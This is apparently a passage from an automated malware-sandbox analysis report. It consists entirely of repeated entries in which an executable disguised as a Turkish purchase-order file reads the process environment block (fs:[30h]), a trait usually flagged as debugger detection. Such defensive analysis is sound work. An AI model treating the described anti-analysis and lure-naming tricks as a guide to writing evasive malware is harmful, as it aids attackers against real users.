            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov ecx, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B035C mov eax, dword ptr fs:[00000030h]5_2_017B035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FA352 mov eax, dword ptr fs:[00000030h]5_2_017FA352
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D8350 mov ecx, dword ptr fs:[00000030h]5_2_017D8350
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B2349 mov eax, dword ptr fs:[00000030h]5_2_017B2349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C310 mov ecx, dword ptr fs:[00000030h]5_2_0172C310
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01750310 mov ecx, dword ptr fs:[00000030h]5_2_01750310
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A30B mov eax, dword ptr fs:[00000030h]5_2_0176A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A30B mov eax, dword ptr fs:[00000030h]5_2_0176A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A30B mov eax, dword ptr fs:[00000030h]5_2_0176A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E3F0 mov eax, dword ptr fs:[00000030h]5_2_0174E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E3F0 mov eax, dword ptr fs:[00000030h]5_2_0174E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E3F0 mov eax, dword ptr fs:[00000030h]5_2_0174E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017663FF mov eax, dword ptr fs:[00000030h]5_2_017663FF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017403E9 mov eax, dword ptr fs:[00000030h]5_2_017403E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01808324 mov eax, dword ptr fs:[00000030h]5_2_01808324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01808324 mov ecx, dword ptr fs:[00000030h]5_2_01808324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01808324 mov eax, dword ptr fs:[00000030h]5_2_01808324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01808324 mov eax, dword ptr fs:[00000030h]5_2_01808324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE3DB mov eax, dword ptr fs:[00000030h]5_2_017DE3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE3DB mov eax, dword ptr fs:[00000030h]5_2_017DE3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE3DB mov ecx, dword ptr fs:[00000030h]5_2_017DE3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DE3DB mov eax, dword ptr fs:[00000030h]5_2_017DE3DB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D43D4 mov eax, dword ptr fs:[00000030h]5_2_017D43D4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D43D4 mov eax, dword ptr fs:[00000030h]5_2_017D43D4
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EC3CD mov eax, dword ptr fs:[00000030h]5_2_017EC3CD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A3C0 mov eax, dword ptr fs:[00000030h]5_2_0173A3C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017383C0 mov eax, dword ptr fs:[00000030h]5_2_017383C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017383C0 mov eax, dword ptr fs:[00000030h]5_2_017383C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017383C0 mov eax, dword ptr fs:[00000030h]5_2_017383C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017383C0 mov eax, dword ptr fs:[00000030h]5_2_017383C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B63C0 mov eax, dword ptr fs:[00000030h]5_2_017B63C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0180634F mov eax, dword ptr fs:[00000030h]5_2_0180634F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728397 mov eax, dword ptr fs:[00000030h]5_2_01728397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728397 mov eax, dword ptr fs:[00000030h]5_2_01728397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728397 mov eax, dword ptr fs:[00000030h]5_2_01728397
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E388 mov eax, dword ptr fs:[00000030h]5_2_0172E388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E388 mov eax, dword ptr fs:[00000030h]5_2_0172E388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E388 mov eax, dword ptr fs:[00000030h]5_2_0172E388
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175438F mov eax, dword ptr fs:[00000030h]5_2_0175438F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175438F mov eax, dword ptr fs:[00000030h]5_2_0175438F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E0274 mov eax, dword ptr fs:[00000030h]5_2_017E0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734260 mov eax, dword ptr fs:[00000030h]5_2_01734260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734260 mov eax, dword ptr fs:[00000030h]5_2_01734260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734260 mov eax, dword ptr fs:[00000030h]5_2_01734260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172826B mov eax, dword ptr fs:[00000030h]5_2_0172826B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172A250 mov eax, dword ptr fs:[00000030h]5_2_0172A250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736259 mov eax, dword ptr fs:[00000030h]5_2_01736259
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EA250 mov eax, dword ptr fs:[00000030h]5_2_017EA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EA250 mov eax, dword ptr fs:[00000030h]5_2_017EA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B8243 mov eax, dword ptr fs:[00000030h]5_2_017B8243
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B8243 mov ecx, dword ptr fs:[00000030h]5_2_017B8243
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172823B mov eax, dword ptr fs:[00000030h]5_2_0172823B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018062D6 mov eax, dword ptr fs:[00000030h]5_2_018062D6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402E1 mov eax, dword ptr fs:[00000030h]5_2_017402E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402E1 mov eax, dword ptr fs:[00000030h]5_2_017402E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402E1 mov eax, dword ptr fs:[00000030h]5_2_017402E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402A0 mov eax, dword ptr fs:[00000030h]5_2_017402A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402A0 mov eax, dword ptr fs:[00000030h]5_2_017402A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov ecx, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0180625D mov eax, dword ptr fs:[00000030h]5_2_0180625D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E284 mov eax, dword ptr fs:[00000030h]5_2_0176E284
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E284 mov eax, dword ptr fs:[00000030h]5_2_0176E284
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B0283 mov eax, dword ptr fs:[00000030h]5_2_017B0283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B0283 mov eax, dword ptr fs:[00000030h]5_2_017B0283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B0283 mov eax, dword ptr fs:[00000030h]5_2_017B0283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176656A mov eax, dword ptr fs:[00000030h]5_2_0176656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176656A mov eax, dword ptr fs:[00000030h]5_2_0176656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176656A mov eax, dword ptr fs:[00000030h]5_2_0176656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738550 mov eax, dword ptr fs:[00000030h]5_2_01738550
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738550 mov eax, dword ptr fs:[00000030h]5_2_01738550
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6500 mov eax, dword ptr fs:[00000030h]5_2_017C6500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E5E7 mov eax, dword ptr fs:[00000030h]5_2_0175E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E5E7 mov eax, dword ptr fs:[00000030h]5_2_0175E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E5E7 mov eax, dword ptr fs:[00000030h]5_2_0175E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E5E7 mov eax, dword ptr fs:[00000030h]5_2_0175E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E5E7 mov eax, dword ptr fs:[00000030h]5_2_0175E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E5E7 mov eax, dword ptr fs:[00000030h]5_2_0175E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E5E7 mov eax, dword ptr fs:[00000030h]5_2_0175E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E5E7 mov eax, dword ptr fs:[00000030h]5_2_0175E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017325E0 mov eax, dword ptr fs:[00000030h]5_2_017325E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176C5ED mov eax, dword ptr fs:[00000030h]5_2_0176C5ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176C5ED mov eax, dword ptr fs:[00000030h]5_2_0176C5ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017365D0 mov eax, dword ptr fs:[00000030h]5_2_017365D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A5D0 mov eax, dword ptr fs:[00000030h]5_2_0176A5D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A5D0 mov eax, dword ptr fs:[00000030h]5_2_0176A5D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E5CF mov eax, dword ptr fs:[00000030h]5_2_0176E5CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E5CF mov eax, dword ptr fs:[00000030h]5_2_0176E5CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017545B1 mov eax, dword ptr fs:[00000030h]5_2_017545B1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017545B1 mov eax, dword ptr fs:[00000030h]5_2_017545B1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B05A7 mov eax, dword ptr fs:[00000030h]5_2_017B05A7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B05A7 mov eax, dword ptr fs:[00000030h]5_2_017B05A7
